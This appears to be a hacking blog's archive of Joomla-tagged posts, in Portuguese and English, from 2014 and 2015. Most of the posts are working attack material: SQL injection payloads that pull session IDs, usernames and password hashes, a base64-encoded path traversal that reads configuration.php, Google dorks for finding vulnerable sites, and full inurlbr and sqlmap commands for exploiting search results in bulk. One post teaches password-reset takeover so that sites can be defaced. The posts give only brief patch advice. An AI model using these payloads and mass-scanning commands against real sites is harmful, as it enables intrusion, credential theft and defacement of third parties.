Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador joomla. Mostrar todas as postagens
Mostrando postagens com marcador joomla. Mostrar todas as postagens

terça-feira, 27 de outubro de 2015

Joomla SQL Injection Vulnerability Exploit Results in Full Administrative Access / inurlbr scanner for mass exploitation.

Trustwave SpiderLabs researcher Asaf Orpani has discovered an SQL injection vulnerability in versions 3.2 through 3.4.4 of Joomla, a popular open-source Content Management System (CMS). Combining that vulnerability with other security weaknesses, our Trustwave SpiderLabs researchers are able to gain full administrative access to any vulnerable Joomla site.  Joomla had a 6.6 percent share of the market for website CMSs as of October 20, 2015 according to W3Techs—second only to WordPress. Internet services company BuiltWith estimates that as many as 2.8 million websites worldwide use Joomla.  CVE-2015-7297, CVE-2015-7857, and CVE-2015-7858 cover the SQL injection vulnerability and various mutations related to it.  CVE-2015-7857 enables an unauthorized remote user to gain administrator privileges by hijacking the administrator session. Following exploitation of the vulnerability, the attacker may gain full control of the web site and execute additional attacks.  The vulnerability can be exploited in Joomla versions 3.2 (released in November 2013) through version 3.4.4. Because the vulnerability is found in a core module that doesn't require any extensions, all websites that use Joomla versions 3.2 and above are vulnerable. Asaf also uncovered the related vulnerabilities CVE-2015-7858 and CVE-2015-7297 as part of his research.


Joomla CMS that affects more than 2.8 million sites.
Joomla is probably one of web content management (or CMS) more used to creating websites at the enterprise level but also widely used for developing personal websites.
It is an Open source software under the GNU / GPL license, being updated by a community of programmers organized a non-profit structure (Joomla.org).
According to Trustwave joomla CMS (3.2 to 3.4.4) have serious security flaws enabling SQL Injection-type attacks which allow attackers to "win" platform Administrator privileges

Trustwave SpiderLabs researcher Asaf Orpani has discovered an SQL injection vulnerability in versions 3.2 through 3.4.4 of Joomla, a popular open-source Content Management System (CMS). Combining that vulnerability with other security weaknesses, our Trustwave SpiderLabs researchers are able to gain full administrative access to any vulnerable Joomla site.

Joomla had a 6.6 percent share of the market for website CMSs as of October 20, 2015 according to W3Techs—second only to WordPress. Internet services company BuiltWith estimates that as many as 2.8 million websites worldwide use Joomla.

CVE-2015-7297, CVE-2015-7857, and CVE-2015-7858 cover the SQL injection vulnerability and various mutations related to it.

CVE-2015-7857 enables an unauthorized remote user to gain administrator privileges by hijacking the administrator session. Following exploitation of the vulnerability, the attacker may gain full control of the web site and execute additional attacks.

The vulnerability can be exploited in Joomla versions 3.2 (released in November 2013) through version 3.4.4.
Because the vulnerability is found in a core module that doesn't require any extensions, all websites that use Joomla versions 3.2 and above are vulnerable.
Asaf also uncovered the related vulnerabilities CVE-2015-7858 and CVE-2015-7297 as part of his research.
Trustwave SpiderLabs recommends that ALL Joomla users update their Joomla installations to version 3.4.5.
UPDATE:
https://www.joomla.org/announcements/release-news/5634-joomla-3-4-5-released.html
Source INFO-> [  More Info ]

It was found that the following code snippet is vulnerable SQLI:
PWD: /administrator/components/com_contenthistory/models/history.php
The vulnerability can be exploited in Joomla versions 3.2 (released in November 2013) through version 3.4.4. Because the vulnerability is found in a core module that doesn't require any extensions, all websites that use Joomla versions 3.2 and above are vulnerable. Asaf also uncovered the related vulnerabilities CVE-2015-7858 and CVE-2015-7297 as part of his research. Trustwave SpiderLabs recommends that ALL Joomla users update their Joomla installations to version 3.4.5. Source-> more info  It was found that the following code snippet is vulnerable SQLI: PWD: /administrator/components/com_contenthistory/models/history.php
FUNCTION FULL:
 /**
  * Build an SQL query to load the list data.
  *
  * @return  JDatabaseQuery
  *
  * @since   3.2
  */
 protected function getListQuery()
 {
  // Create a new query object.
  $db = $this->getDbo();
  $query = $db->getQuery(true);

  // Select the required fields from the table.
  $query->select(
   $this->getState(
    'list.select',
    'h.version_id, h.ucm_item_id, h.ucm_type_id, h.version_note, h.save_date, h.editor_user_id,' .
    'h.character_count, h.sha1_hash, h.version_data, h.keep_forever'
   )
  )
  ->from($db->quoteName('#__ucm_history') . ' AS h')
  ->where($db->quoteName('h.ucm_item_id') . ' = ' . $this->getState('item_id'))
  ->where($db->quoteName('h.ucm_type_id') . ' = ' . $this->getState('type_id'))

  // Join over the users for the editor
  ->select('uc.name AS editor')
  ->join('LEFT', '#__users AS uc ON uc.id = h.editor_user_id');

  // Add the list ordering clause.
  $orderCol = $this->state->get('list.ordering');
  $orderDirn = $this->state->get('list.direction');
  $query->order($db->quoteName($orderCol) . $orderDirn);

  return $query;
 }
CODE FULL:
http://pastebin.com/9FnPuns5

PoC:
REQUEST GET
http://{TARGET}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1 &list[select]= (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM jml_session LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

It is possible to extract session ID (cookies) of users logged into the system and set in your browser.
REQUEST GET http://{TARGET}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1 &list[select]= (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM jml_session LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)  It is possible to extract session ID (cookies) of users logged into the system and set in your browser.
Video demonstration:


In this article we will work SQLI exploitation.

RETURN REQUEST - Exemple Explotation:
URL:
http://{TARGET}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1+AND+(SELECT+5030+FROM(SELECT+COUNT(*),CONCAT(0x203a494e55524c42523a20,version(),0x203a494e55524c42523a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)
PRINT REQUEST:
PoC: REQUEST GET http://{TARGET}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1 &list[select]= (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM jml_session LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)   RETURN REQUEST - Exemple Explotation: URL: http://{TARGET}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1+AND+(SELECT+5030+FROM(SELECT+COUNT(*),CONCAT(0x203a494e55524c42523a20,version(),0x203a494e55524c42523a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)  PRINT REQUEST:

Base validation:
ENCODER HEX =  :INURLBR: 
RESULT =                0x203a494e55524c42523a20

INJECT: 0x203a494e55524c42523a20,version(),0x203a494e55524c42523a20....
DORK:
  1. components/com_contenthistory/
  2. inurl:com_contenthistory
  3. index.php?option=com_contenthistory
  4. "index of" components/com_contenthistory/
  5. inurl:"components/com_contenthistory/"
  6. inurl:"index.php?option=com_contenthistory"
Search demonstration:
DORK: components/com_contenthistory/ "index of" components/com_contenthistory/ inurl:"components/com_contenthistory/"

Using inurlbr scanner for mass exploitation:
 Download script: https://github.com/googleinurl/SCANNER-INURLBR
- Creating our command

SET DORK:
 --dork 'YOU_DORK'
 OR
 --dork-file 'YOU_FILE_DORK.txt'

SET SEARCH ENGINES:
-q all
  we will use all the search engines available in the script

SET OUTPUT FILE:
 -s com_contenthistory.txt

SET TIPE VALIDATION:
 -t 2
    2 The second type tries to valid the error defined by: -a 'VALUE_INSIDE_THE _TARGET'
              It also establishes connection with the exploit through the get method.

Before setting the exploit we get to manipulate its string, for that we use a domestic function of inurlbr scanner so passes a validation string within the SQL injection to be able to separate vulnerable targets.

Internal function - Converting strings in hexadecimal
 hex Encrypt values in hex.
     Example: hex({value})
     Usage:   hex(102030)
     Usage:   --exploit-get 'user?id=hex(102030)'
     Result inject:
     http://www.target.localhost.br/user?id=313032303330

--exploit-get '/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1 AND (SELECT 5030 FROM(SELECT COUNT(*),CONCAT(0xhex(INURLBR),versio(),0xhex(INURLBR),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))'

hex(INURLBR) = 494e55524c4252

Example injection:
http://www.target.localhost.br/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1 AND (SELECT 5030 FROM(SELECT COUNT(*),CONCAT(0xhex(INURLBR),versio(),0xhex(INURLBR),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))

SET STRING VALIDATION:
Specify the string that will be used on the search script:
     Example:  -a {string}
     Usage:    -a '<title>hello world</title>'
     If specific value is found in the target he is considered vulnerable.
     Setting:   -a 'INURLBR'

SET FILTER RESULTS:
 --unique
   Filter results in unique domains.
   removes all gets the URL

Let's validate the string "INURLBR" as she passed within the SQLI exploit, if such value appear on our target was successfully injected.

COMMAND FULL: 
php inurlbr.php --dork 'inurl:"/components/com_contenthistory"' -s com_contenthistory.txt --exploit-get '/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1 AND (SELECT 5030 FROM(SELECT COUNT(*),CONCAT(0xhex(INURLBR),versio(),0xhex(INURLBR),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))' -t 3 -a 'INURLBR' --unique


Execution return:
 SET STRING VALIDATION: Specify the string that will be used on the search script:      Example:  -a {string}      Usage:    -a '<title>hello world</title>'      If specific value is found in the target he is considered vulnerable.      Setting:   -a 'INURLBR'  SET FILTER RESULTS:  --unique    Filter results in unique domains.    removes all gets the URL  Let's validate the string "INURLBR" as she passed within the SQLI exploit, if such value appear on our target was successfully injected.  COMMAND FULL:  php inurlbr.php --dork 'inurl:"/components/com_contenthistory"' -s com_contenthistory.txt --exploit-get '/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1 AND (SELECT 5030 FROM(SELECT COUNT(*),CONCAT(0xhex(INURLBR),versio(),0xhex(INURLBR),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))' -t 3 -a 'INURLBR' --unique   Execution return:


SOLUTION:Trustwave SpiderLabs recommends that ALL Joomla users update their Joomla installations to version 3.4.5.
UPDATE:
https://www.joomla.org/announcements/release-news/5634-joomla-3-4-5-released.html

Source INFO-1-> https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/?page=1&year=0&month=0

Source INFO-2-> https://cxsecurity.com/issue/WLB-2015100146

quinta-feira, 30 de julho de 2015

Resetando senha WORDPRESS/JOOMLA via SQL injection

[0x00] Introdução Bom vamos lá esse artigo é bem simples porem bem útil para gurizada que curte um defacement porém não possui muito conhecimento  e que passam um bom tempo ate conseguir "quebrar" um hash dessas CMS.


[0x00] Introdução

Bom vamos lá esse artigo é bem simples porem bem útil para gurizada que curte um defacement porém não possui muito conhecimento  e que passam um bom tempo ate conseguir "quebrar" um hash dessas CMS.

[0x01] Conceito Joomla

Não sei bem se podemos chamar de conceito porém esse termo se encaixa bem e se não me falha a memoria já vi um artigo similar em algum lugar só não me recordo o autor.

[0x01a] A Hash 
   A hash utilizada pelo Joomla é uma especie de MD5 que divide a senha em partes apos o : se o numero de caracteres for impar sera acrescentado um a mais na primeira md5.

[0x01b] Exemplo:
147c6577fd36d90147c4ee3a5a0cceaa:sWTeBV3KGXeCtb6ivBFXKBRhMIJE4O0 a parte em preto corresponde a 0X4 e a parte destacada em vermelho h4x

[0x02] Injeção 

É bem semelhante a uma injeção de SQL normal apenas mudamos as tabela e colunas que vão ser exploradas em um caso normal estaríamos atras de colunas responsável pelo armazenamento do nome de usuário e senha porém dessa vez buscaremos a tabela responsável pelos códigos de ativação e email.

[0x02b] Tabela alvo
 O alvo é _user o nome pode variar porem em 90% dos casos sempre possui _user e vamos pegar as colunas email e activation.
Pegaremos o email e o introduziremos em alvo.ru/index.php?option=com_user&view=reset apos isso é só colocar o código pego na coluna activation e será possível escolher uma nova senha.

[0x03] Conceito Wordpress

Não muda muita coisa da injeção em joomla apenas possui um tipo de hash ate o momento "desconhecida" 

[0x03a] Tabela alvo e colunas
                 a tabela alvo é wp_users e as colunas são user_login user_activation_key.

[0x03b] Resetando 
    é bem semelhante ao joomla apenas muda o caminho por trata se de CMS diferentes primeiro entraremos em alvo.ru/wp-login.php?action=lostpassword e colocaremos o usuário que desejamos mudar a senha usuário obtido na user_login apos isso entraremos em /wp-login.php?action=rp&key=l33ts&login=h4x0r.

[0x04] Explicação Wordpress

Bom creio que todos tenham entendido a parte l33ts e h4x0r mas para os desatentos onde possui l33ts na url você introduz o código correspondente obtido em user_activation_key e onde localiza se H4x0r é o usuário obtido em user_login.

Solução ?
Mantenha seu CMS sempre atualizado e informe-se sobre 
novas falhas .

quarta-feira, 15 de julho de 2015

Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)

Exploring component of Joomla cms


# Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI) # CWE: CWE-200(FPD) CWE-98(LFI/LFD) # Risk: High # Author: Hugo Santiago dos Santos # Contact: hugo.s@linuxmail.org # Date: 13/07/2015 # Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman https://www.exploit-db.com/exploits/37620/


# Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)
# CWE: CWE-200(FPD) CWE-98(LFI/LFD)
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: [email protected]
# Date: 13/07/2015
# Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman
https://www.exploit-db.com/exploits/37620/

There is a get parameter untreated in the application "file=" which enables download files from the server.

Google Dork:
inurl:"/components/com_docman/dl2.php"

POC:
http://www.site.com/components/com_docman/dl2.php?archive=0&file=base64([LDF])

Internment such an application must use the native function of php base64_decode to access your files.

string base64_decode ( string $data [, bool $strict = false ] );
more http://php.net/manual/en/function.base64-decode.php

The application uses crypt 64 then we should do the same to get the server files.

injection string:
../../../../../../../target/www/configuration.php <= Not Ready

encoded string:

Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA== <= Ready !

Example
http://www.site.com/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA==  <= Ready !

Using inurlbr scanner for mass exploitation:
 Download script: https://github.com/googleinurl/SCANNER-INURLBR
- Creating our command

SET DORK:
--dork 'inurl:"/components/com_docman/dl2.php"'

SET OUTPUT FILE:
 -s dl2.txt 

SET EXPLOIT GET
To encode our injection string we use a ineterna function of inurlbr script.
 base64 Encrypt values in base64.
     Example: base64({value})
     Usage:    base64(102030)
     Usage:
      --exploit-get 'user?id=base64(102030)'
  URL with inject get:
  http://www.target.us/user?id=MTAyMDMw
Use:
--exploit-get '/dl2.php?archive=0&file=base64(../../../../../../../target/www/configuration.php)'

OR USE SITE ENCODER: https://www.base64encode.org/
Use:
--exploit-get '/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA=='

SET FILTER 
Filter results in unique domains.
--unique

SET VALIDATION
Valid results based on your return http code.
      Example: --ifcode {ifcode}
      Usage:    --ifcode 200

COMPLETE COMMAND:
php inurlbr.php --dork 'inurl:"/components/com_docman/dl2.php"' -s dl2.txt  --exploit-get '/dl2.php?archive=0&file=base64(../../../../../../../target/www/configuration.php)'  --unique --ifcode 200

OR

php inurlbr.php --dork 'inurl:"/components/com_docman/dl2.php"' -s dl2.txt  --exploit-get '/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA=='  --unique --ifcode 200


Remediation:
The most effective solution to eliminate file inclusion vulnerabilities is to avoid passing user-submitted input to any filesystem/framework API. If this is not possible the application can maintain a white list of files, that may be included by the page, and then use an identifier (for example the index number) to access to the selected file. Any request containing an invalid identifier has to be rejected, in this way there is no attack surface for malicious users to manipulate the path.
https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
https://www.owasp.org/index.php/Full_Path_Disclosure

segunda-feira, 6 de julho de 2015

Joomla S5 Clan Roster com_s5clanroster SQL Injection exploit

EXPLOIT MASS Joomla  - com_s5clanroster

USE INURLBR

In this tutorial we will use the inurlbr tool to find targets and then inject our string of exploration, We will use internal functions of inurlbr script to convert injection string in hexadecimal.  The com_s5clanroster compenet has a SQL injection flaw in their GET parameter "id", This article is based on the script written by the hacker TheLooper (script), Where injected successfully is possible to have access to the target server database information.

In this tutorial we will use the inurlbr tool to find targets and then inject our string of exploration, We will use internal functions of inurlbr script to convert injection string in hexadecimal.

The com_s5clanroster compenet has a SQL injection flaw in their GET parameter "id", This article is based on the script written by the hacker TheLooper (script), Where injected successfully is possible to have access to the target server database information.

DORK:
inurl:"index.php?option=com_s5clanroster"

SQL INJECTION:
%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(username,0x3a,password),222+from+jos_users--%20-

POC:
http://www.target.gov.br/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null{SQL INJECTION}

With access to this information we put together our command for mass exploitation.
Let's use the scanner inurlbr: 
http://github.com/googleinurl/SCANNER-INURLBR

SET DORK:
--dork 'inurl:"index.php?option=com_s5clanroster"'

SET FILE OUTPUT:
-s vuln.log

SET TIPE VALIDATION:
-t 3
       3   - The third type combine both first and second types:
              Then, of course, it also establishes connection with the exploit through the get method
              Demo: www.target.com.br{exploit}


SET EXPLOIT REQUEST - GET:
--exploit-get {YOU_GET}

Before setting the exploit we get to manipulate its string, for that we use a domestic function of inurlbr scanner so passes a validation string within the SQL injection to be able to separate vulnerable targets.

Internal function - Converting strings in hexadecimal
 hex Encrypt values in hex.
     Example: hex({value})
     Usage:   hex(102030)
     Usage:   --exploit-get 'user?id=hex(102030)'
     Result inject:
     http://www.target.gov.br/user?id=313032303330


--exploit-get '/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0xhex(inurlbr_vuln),username,password,0xhex(<br>)),222+from+jos_users--%20-'

hex(inurlbr_vuln) = 696e75726c62725f76756c6e 
hex(<br>) = 3c62723e
Example injection:
http://www.target.gov.br/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0x696e75726c62725f76756c6e,username,password,0x3c62723e),222+from+jos_users--%20-'

SET STRING VALIDATION:
Specify the string that will be used on the search script:
Example: -a {string}
Usage:   -a '<title>hello world</title>'
If specific value is found in the target he is considered vulnerable.
Setting:   -a 'inurlbr_vuln'
Let's validate the string "inurlbr_vuln" as she passed within the SQLI exploit, if such value appear on our target was successfully injected.
SET STRING VALIDATION: Specify the string that will be used on the search script: Example: -a {string} Usage:   -a '<title>hello world</title>' If specific value is found in the target he is considered vulnerable. Setting: -a 'inurlbr_vuln' Let's validate the string "inurlbr_vuln" as she passed within the SQLI exploit, if such value appear on our target was successfully injected.

COMMAND FULL:
php inurlbr.php --dork 'inurl:"index.php?option=com_s5clanroster"' -s vuln.log -t 3 --exploit-get '/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0xhex(inurlbr_vuln),username,password,0xhex(<br>)),222+from+jos_users--%20-'
-a 'inurlbr_vuln'

PRINT PROCESS:
COMMAND FULL: php inurlbr.php --dork 'inurl:"index.php?option=com_s5clanroster"' -s vuln.log -t 3 --exploit-get '/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0xhex(inurlbr_vuln),username,password,0xhex(<br>)),222+from+jos_users--%20-'  PRINT PROCESS:

terça-feira, 17 de março de 2015

MINI EXPLOIT: Joomla Simple Photo Gallery - SQL injection + VIDEO

Usando miniexploit para explorar em massa vários alvos.

Usando miniexploit para explorar em massa vários alvos. Title: Joomla Simple Photo Gallery - SQL injection Date : 13-03-2015 Vendor Homepage: https://www.apptha.com/ Source Plugin: https://www.apptha.com/category/extension/joomla/simple-photo-gallery Version : 1 Tested on : sqlmap

Title: Joomla Simple Photo Gallery - SQL injection
Date : 13-03-2015
Vendor Homepage: https://www.apptha.com/
Source Plugin: https://www.apptha.com/category/extension/joomla/simple-photo-gallery
Version : 1
Tested on : sqlmap

POC:
http://{$target}/index.php?option=com_simplephotogallery&view=images&albumid=[SQLI]

Comando SQLMAP de exploração:
sqlmap  -u '{$target}/index.php?option=com_simplephotogallery&view=images&albumid=1' -p albumid --batch --dbms=MySQL --proxy 'http://localhost:8118' --random-agent --level 2 --risk 1 --eta --answers='follow=N' --dbs --is-dba

DORK de pesquisa:
Dork Google 1: inurl:/com_simplephotogallery site:com
Dork Google 2: inurl:/com_simplephotogallery site:org
Dork Google 3: inurl:/com_simplephotogallery site:fr
Dork Google 4: inurl:/com_simplephotogallery/


Agora vamos organizar nosso comando INURLBR  para executar nosso miniexploit.php
Primeiro vamos organizar o parâmetro --dork que captura seu filtro de busca.

 --dork Defines which dork the search engine will use.
     Example: --dork {dork}
     Usage:   --dork 'site:.gov.br inurl:php? id'
     - Using multiples dorks:
     Example: --dork {[DORK]dork1[DORK]dork2[DORK]dork3}
     Usage:   --dork '[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp'
Parâmetro organizado:
--dork '[DORK]inurl:/com_simplephotogallery site:com[DORK]inurl:/com_simplephotogal lery site:org[DORK]inurl:/com_simplephotogallery site:fr[DORK]inurl:/com_simplephotogallery/'

Baixar MINI exploit-SQLMAP / Joomla Simple Photo Gallery 1.0 - SQL injection: 
http://pastebin.com/Gb5uhPKW
File: miniexploit.php

Baixar scanner INURLBR 1.0:
https://github.com/googleinurl/SCANNER-INURLBR
File: inurlbr.php


Executando:
./inurlbr.php --dork '[DORK]inurl:/com_simplephotogallery site:com[DORK]inurl:/com_simplephotogal lery site:org[DORK]inurl:/com_simplephotogallery site:fr[DORK]inurl:/com_simplephotogallery/' -s save.txt -q 1,6 --command-all "php miniexploit2.php '_TARGET_'"

quinta-feira, 19 de fevereiro de 2015

Conheça o scanner CMSmap feito em python que verifica (WordPress, Joomla e Drupa)


CMSmap é um scanner de código aberto CMS python que automatiza o processo de detecção de falhas do CMSs mais popular de segurança. O principal objetivo do CMSmap é integrar as vulnerabilidades comuns para diferentes tipos de CMSs em uma única ferramenta.  No momento, CMSs apoiado por CMSmap são WordPress, Joomla e Drupal.  Por favor, note que este projeto é um estado inicial. Como tal, você pode encontrar erros, falhas ou mulfunctions. Use por sua conta e risco!  Installation diretamente GIT: git clone https://github.com/Dionach/CMSmap.git


CMSmap é um scanner de código aberto CMS python que automatiza o processo de detecção de falhas do CMSs mais popular de segurança. O principal objetivo do CMSmap é integrar as vulnerabilidades comuns para diferentes tipos de CMSs em uma única ferramenta.

No momento, CMSs apoiado por CMSmap são WordPress, Joomla e Drupal.

Por favor, note que este projeto é um estado inicial. Como tal, você pode encontrar erros, falhas ou mulfunctions. Use por sua conta e risco!

Installation diretamente GIT:
git clone https://github.com/Dionach/CMSmap.git


CMSmap tool v0.3 - Simple CMS Scanner
Author: Mike Manzotti [email protected]
Usage: cmsmap.py -t 
          -t, --target    target URL (e.g. 'https://abc.test.com:8080/')
          -v, --verbose   verbose mode (Default: false)
          -T, --threads   number of threads (Default: 5)
          -u, --usr       username or file 
          -p, --psw       password or file
          -i, --input     scan multiple targets listed in a given text file
          -o, --output    save output in a file
          -k, --crack     password hashes file
          -w, --wordlist  wordlist file (Default: rockyou.txt - WordPress only)       
          -a, --agent     set custom user-agent  
          -U, --update    (C)MSmap, (W)ordpress plugins and themes, (J)oomla components, (D)rupal modules
          -f, --force     force scan (W)ordpress, (J)oomla or (D)rupal
          -F, --fullscan  full scan using large plugin lists. Slow! (Default: false)
          -h, --help      show this help   

Example: cmsmap.py -t https://example.com
         cmsmap.py -t https://example.com -f W -F
         cmsmap.py -t https://example.com -i targets.txt -o output.txt
         cmsmap.py -t https://example.com -u admin -p passwords.txt
         cmsmap.py -k hashes.txt


Uso de CMSmap para atacar alvos sem prévio consentimento mútuo é ilegal. É de responsabilidade do usuário final a obedecer todas as leis aplicáveis locais, estaduais e federais. Os desenvolvedores não assumimos nenhuma responsabilidade e não somos responsáveis por qualquer uso indevido ou danos causados por este programa.

quarta-feira, 17 de dezembro de 2014

INURLBR + SQLMAP EXPLOIT - Explorando com_page vamos a fundo no comando --command-all

Joomla Component com_page - SQL Injection
INURLBR + SQLMAP EXPLOIT - Explorando com_page vamos a fundo no comando --comand-all
Explorando falha SQL componente com_page o diferencial que vamos utilizar 2 ferramentas para otimizar o tempo de analise:
DORK[1]:
inurl:index.php?option=com_page&id_p=
--------------------------------------------------------------------------------------
DORK[2]: 
intext:option=com_page
--------------------------------------------------------------------------------------

Otimizando a busca
Quando usamos dorks temos um trabalho de acessar cada site testar e verificar se está vulnerável, muitas vezes remontar a url alvo.
Umas da utilidade do SCANNER INURLBR é fazer tal processo e otimizar nosso tempo.
Com analise de erros ou valores personalizados podemos identificar se está com erro padrão SQL e executar exploits/scripts externos para extrair mais informações.

Logica de processo:
  1. BUSCAR ALVOS EM MOTORES DE BUSCA.
  2. RETIRAR URLS INDESEJADAS.
  3. RETIRAR DUPLICATAS.
  4. CONVERTER VALORES EM UM ARRAY DE DADOS.
  5. ACESSAR ARRAY E PROCESSAR CADA URL INDIVIDUALMENTE.
  6. ANALISAR ERROS PADRÕES OU PERSONALIZAS.
  7. SE (OPÇÃO COMAND ESTIVER SETADA SERÁ EXECUTADO UM COMANDO NO TERMINAL) 
  8. ALVOS QUE FOREM ENCONTRADOS ERROS PADRÕES PREDEFINIDOS NO SCRIPT SERÁ SEPARADO EM UM ARQUIVO OUTPUT.

Usando SCANNER INURLBR:
Comando->{

Exmplo:
./inurlbr.php 
--dork 'YOUR_DORK' 
-s OUTPUT.txt  
-q  {OP_MOTOR_SEARCH}
--comand-all 'RUN_YOUR_COMMAND_IN_TERMINAL'

Usando:
./inurlbr.php --dork 'inurl:index.php?option=com_page & id_p' -s joomla.txt -q 1,6 --command-all './../../../googleinurl/pentest/sqlmap/sqlmap.py -u "_TARGETFULL_&option=com_page&id_p=8" -p id_p --dbs --time-sec 50 --random-agent --batch --proxy "http://localhost:8118" --dbms=MySQL'

Observação parâmetro --command-all:
Tal parâmetros executa comandos no terminal como próprio nome diz todos vai ser para cada valor encontrado pelo scanner em sua busca.
Pasamanos parâmetros de execução para explorarmos a falha SQLI do componente com uma ferramenta externa SQLMAP,
O script possibilita passar parâmetros como _TARGETFULL_ == URL completa encontrada pelo buscador.

Indo a fundo em --command-*
--command-vul Cada URL vulnerável encontrada irá executar os parâmetros deste comando.
      Exemplo: --command-vul {comando}
      Uso: --command-vul "nmap sV -p 22,80,21 _TARGET_ '
               --command-vul './exploit.sh _TARGET_ output.txt'

  --command-all Utilize este comand para especificar um único comando a cada URL encontrado.
      Exemplo: --command-all {comando}
      Uso: --command-all 'nmap sV -p 22,80,21 _TARGET_'
               --command-all './exploit.sh _TARGET_ output.txt'

observação:

     _TARGET_ Será substituído pelo URL filtrando somente o domínio.
Ex: www.google.com.br/?q=testeste _TARGET_ = www.google.com.br

    _TARGETFULL_ Será substituído pelo URL / alvo original encontrado.
Ex: www.google.com.br/?q=testeste _TARGETFULL_ = www.google.com.br/?q=testeste

Em nosso caso exploramos uma falha SQL-Injection com SQLMAP.
sqlmap.py -u "_TARGETFULL_&option=com_page&id_p=8" -p id_p --dbs --time-sec 50 --random-agent --batch --proxy "http://localhost:8118" --dbms=MySQL'

RESULTADO:
Observação parâmetro --comand-all: Tal parâmetros executa comandos no terminal como próprio nome diz todos vai ser para cada valor encontrado pelo scanner em sua busca. Pasamanos parâmetros de execução para explorarmos a falha SQLI do componente com uma ferramenta externa SQLMAP, O script possibilita passar parâmetros como _TARGETFULL_ == URL completa encontrada pelo buscador.

}


Referencias

sexta-feira, 19 de setembro de 2014

SCANNER INURLBR + Exploit Vulnerability Joomla Plugin Calendar

0xSCAN + EXPLOIT

SCANNER INURLBR + Exploit Vulnerability Joomla Plugin Calendar

----------------------------------------------------------------------------------------------------------

0x[+] Exploit Title : Joomla Spider Calendar <= 3.2.6 SQL Injection
0x[+] Exploit Author : Claudio Viviani
0x[+] Vendor Homepage : http://web-dorado.com/
0x[+] Software: http://extensions.joomla.org/extensions/calendars-a-events/events/events-calendars/22329

Date : 2014-08-31
0x[+] Tested on : Windows 7 / Mozilla Firefox
                              Linux / Mozilla Firefox

------------------------------------------------------------------------------------------------

0xDORK[0]: inurl:option=com_spidercalendar
0xDORK[1]: intext:com_spidercalendar & intext:"index of"
0xDORK[2]: inurl:php & inurl:com_spidercalendar

0xVÍDEO[0]


0xVÍDEO[1]



0xCOMANDO INURLBR EXEMPLO={

./inurlbr.php --dork 'inurl:index.php?option=com_spidercalendar' -s joomla.txt -q 1,6 -t 3 --exploit-get "/index.php?option=com_spidercalendar&calendar_id=1'0x27" --command-vul "python exploit/Joomla/joomla-calendar.py -H http://_TARGET_/"


}


0xSCRIPT INURLBR =  {

https://github.com/googleinurl/SCANNER-INURLBR

}

0xEXPLOIT Joomla Plugin Calendar = {

http://1337day.com/exploit/22603

}

segunda-feira, 18 de agosto de 2014

JOOMLA YOUTUBE GALLERY 4.1.7 SQL INJECTION

Joomla Youtube Galeria componente versão 4.1.7 sofre de uma vulnerabilidade de injeção SQL
Joomla Youtube Galeria componente versão 4.1.7 sofre de uma vulnerabilidade de injeção SQL


